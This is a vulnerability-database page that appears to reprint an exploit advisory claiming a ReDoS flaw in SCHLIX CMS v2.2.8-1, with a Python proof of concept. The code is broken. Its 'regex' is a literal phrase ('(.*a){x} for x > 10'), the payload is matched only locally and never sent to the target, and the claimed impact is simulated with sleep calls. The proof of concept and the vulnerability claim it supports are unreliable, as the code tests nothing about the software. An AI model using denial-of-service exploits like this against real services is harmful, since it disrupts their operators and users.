SCHLIX v2.2.8-1 Regular Expression Denial of Service

2024.02.10
iq h4xforensics-diyar (IQ) iq
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: SCHLIX v2.2.8-1 Regular Expression Denial of Service # Date: 02/10/2024 # Exploit Author: Diyar Saadi # Vendor Homepage: https://www.schlix.com # Software Link: https://www.schlix.com/html/schlix-cms-downloads.html # Version: v2.2.8-1 # Tested on: Windows 11 + XAMPP ## Description ## SCHLIX v2.2.8-1 is vulnerable to regular expression denial of service . (ReDoS) is an algorithmic complexity attack that produces a denial-of-service by providing a regular expression and/or an input that takes a long time to evaluat… ## Proof Of Concept ## import requests import re import time def test_redos(url, payload): try: vulnerable_regex = r'(.*a){x} for x > 10' match = re.match(vulnerable_regex, payload) if match: print("Vulnerability not triggered.") else: print("Vulnerability may be present. Simulating 30-second impact...") for _ in range(6): time.sleep(5) print("Simulating impact...") print("Simulated impact duration completed.") except re.error: print("Error in regex pattern.") try: response = requests.get(url) if response.status_code == 200: print("Service is up.") else: print("Service may be down or inaccessible.") except requests.RequestException as e: print(f"HTTP Request Error: {str(e)}") if __name__ == "__main__": target_url = 'http://localhost' payload = "aaaaaaaaaaaaaaaaaaaaaaaaa!" test_redos(target_url, payload)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top